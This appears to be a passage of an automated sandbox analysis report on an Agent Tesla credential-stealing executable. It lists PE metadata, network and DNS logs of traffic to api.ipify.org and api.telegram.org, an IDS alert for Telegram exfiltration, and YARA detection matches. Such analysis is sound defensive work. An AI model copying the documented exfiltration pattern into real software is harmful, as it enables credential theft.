                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000xa20500xa2200False0.9359384035273709data7.934508263967678IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0xa60000x48540x4a00False0.5450802364864865data6.213792802382621IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xac0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountry
                                                            RT_ICON0xa61300x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384
                                                            RT_GROUP_ICON0xaa3580x14data
                                                            RT_VERSION0xaa36c0x2fcdata
                                                            RT_MANIFEST0xaa6680x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                            DLLImport
                                                            mscoree.dll_CorExeMain
                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            192.168.2.3149.154.167.220497034432851779 11/03/22-12:21:37.839026TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49703443192.168.2.3149.154.167.220
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 3, 2022 12:21:25.394248962 CET49702443192.168.2.33.220.57.224
                                                            Nov 3, 2022 12:21:25.394336939 CET443497023.220.57.224192.168.2.3
                                                            Nov 3, 2022 12:21:25.394505978 CET49702443192.168.2.33.220.57.224
                                                            Nov 3, 2022 12:21:25.438405037 CET49702443192.168.2.33.220.57.224
                                                            Nov 3, 2022 12:21:25.438488960 CET443497023.220.57.224192.168.2.3
                                                            Nov 3, 2022 12:21:25.732002020 CET443497023.220.57.224192.168.2.3
                                                            Nov 3, 2022 12:21:25.732249022 CET49702443192.168.2.33.220.57.224
                                                            Nov 3, 2022 12:21:25.737373114 CET49702443192.168.2.33.220.57.224
                                                            Nov 3, 2022 12:21:25.737407923 CET443497023.220.57.224192.168.2.3
                                                            Nov 3, 2022 12:21:25.737855911 CET443497023.220.57.224192.168.2.3
                                                            Nov 3, 2022 12:21:25.871424913 CET49702443192.168.2.33.220.57.224
                                                            Nov 3, 2022 12:21:26.340863943 CET49702443192.168.2.33.220.57.224
                                                            Nov 3, 2022 12:21:26.340910912 CET443497023.220.57.224192.168.2.3
                                                            Nov 3, 2022 12:21:26.480662107 CET443497023.220.57.224192.168.2.3
                                                            Nov 3, 2022 12:21:26.480782986 CET443497023.220.57.224192.168.2.3
                                                            Nov 3, 2022 12:21:26.480864048 CET49702443192.168.2.33.220.57.224
                                                            Nov 3, 2022 12:21:26.504179955 CET49702443192.168.2.33.220.57.224
                                                            Nov 3, 2022 12:21:37.714263916 CET49703443192.168.2.3149.154.167.220
                                                            Nov 3, 2022 12:21:37.714333057 CET44349703149.154.167.220192.168.2.3
                                                            Nov 3, 2022 12:21:37.714464903 CET49703443192.168.2.3149.154.167.220
                                                            Nov 3, 2022 12:21:37.715651989 CET49703443192.168.2.3149.154.167.220
                                                            Nov 3, 2022 12:21:37.715696096 CET44349703149.154.167.220192.168.2.3
                                                            Nov 3, 2022 12:21:37.786349058 CET44349703149.154.167.220192.168.2.3
                                                            Nov 3, 2022 12:21:37.786521912 CET49703443192.168.2.3149.154.167.220
                                                            Nov 3, 2022 12:21:37.791690111 CET49703443192.168.2.3149.154.167.220
                                                            Nov 3, 2022 12:21:37.791733980 CET44349703149.154.167.220192.168.2.3
                                                            Nov 3, 2022 12:21:37.792078972 CET44349703149.154.167.220192.168.2.3
                                                            Nov 3, 2022 12:21:37.795787096 CET49703443192.168.2.3149.154.167.220
                                                            Nov 3, 2022 12:21:37.795840025 CET44349703149.154.167.220192.168.2.3
                                                            Nov 3, 2022 12:21:37.834764957 CET44349703149.154.167.220192.168.2.3
                                                            Nov 3, 2022 12:21:37.838870049 CET49703443192.168.2.3149.154.167.220
                                                            Nov 3, 2022 12:21:37.838929892 CET44349703149.154.167.220192.168.2.3
                                                            Nov 3, 2022 12:21:53.483609915 CET44349703149.154.167.220192.168.2.3
                                                            Nov 3, 2022 12:21:53.483799934 CET44349703149.154.167.220192.168.2.3
                                                            Nov 3, 2022 12:21:53.483903885 CET49703443192.168.2.3149.154.167.220
                                                            Nov 3, 2022 12:21:53.484666109 CET49703443192.168.2.3149.154.167.220
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 3, 2022 12:21:25.296978951 CET4997753192.168.2.38.8.8.8
                                                            Nov 3, 2022 12:21:25.315884113 CET53499778.8.8.8192.168.2.3
                                                            Nov 3, 2022 12:21:25.329701900 CET5784053192.168.2.38.8.8.8
                                                            Nov 3, 2022 12:21:25.348983049 CET53578408.8.8.8192.168.2.3
                                                            Nov 3, 2022 12:21:37.687520981 CET5799053192.168.2.38.8.8.8
                                                            Nov 3, 2022 12:21:37.710592985 CET53579908.8.8.8192.168.2.3
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Nov 3, 2022 12:21:25.296978951 CET192.168.2.38.8.8.80x8663Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                            Nov 3, 2022 12:21:25.329701900 CET192.168.2.38.8.8.80xa62bStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                            Nov 3, 2022 12:21:37.687520981 CET192.168.2.38.8.8.80xe0eeStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Nov 3, 2022 12:21:25.315884113 CET8.8.8.8192.168.2.30x8663No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                            Nov 3, 2022 12:21:25.315884113 CET8.8.8.8192.168.2.30x8663No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                            Nov 3, 2022 12:21:25.315884113 CET8.8.8.8192.168.2.30x8663No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                            Nov 3, 2022 12:21:25.315884113 CET8.8.8.8192.168.2.30x8663No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                            Nov 3, 2022 12:21:25.315884113 CET8.8.8.8192.168.2.30x8663No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                                            Nov 3, 2022 12:21:25.348983049 CET8.8.8.8192.168.2.30xa62bNo error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                            Nov 3, 2022 12:21:25.348983049 CET8.8.8.8192.168.2.30xa62bNo error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                                            Nov 3, 2022 12:21:25.348983049 CET8.8.8.8192.168.2.30xa62bNo error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                            Nov 3, 2022 12:21:25.348983049 CET8.8.8.8192.168.2.30xa62bNo error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                            Nov 3, 2022 12:21:25.348983049 CET8.8.8.8192.168.2.30xa62bNo error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                            Nov 3, 2022 12:21:37.710592985 CET8.8.8.8192.168.2.30xe0eeNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                            • api.ipify.org
                                                            • api.telegram.org

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:12:21:03
                                                            Start date:03/11/2022
                                                            Path:C:\Users\user\Desktop\rzN2ckYW24.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\rzN2ckYW24.exe
                                                            Imagebase:0x9c0000
                                                            File size:684032 bytes
                                                            MD5 hash:44159444C9BC9980871B80B3AE071FFB
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.294910636.0000000002D57000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.293830899.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.299828968.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.299828968.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.299828968.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low

                                                            Target ID:1
                                                            Start time:12:21:14
                                                            Start date:03/11/2022
                                                            Path:C:\Users\user\Desktop\rzN2ckYW24.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Users\user\Desktop\rzN2ckYW24.exe
                                                            Imagebase:0x170000
                                                            File size:684032 bytes
                                                            MD5 hash:44159444C9BC9980871B80B3AE071FFB
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low

                                                            Target ID:2
                                                            Start time:12:21:15
                                                            Start date:03/11/2022
                                                            Path:C:\Users\user\Desktop\rzN2ckYW24.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\rzN2ckYW24.exe
                                                            Imagebase:0x470000
                                                            File size:684032 bytes
                                                            MD5 hash:44159444C9BC9980871B80B3AE071FFB
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.522788647.0000000002854000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.522788647.0000000002854000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.279572374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.279572374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000002.00000000.279572374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low

                                                            No disassembly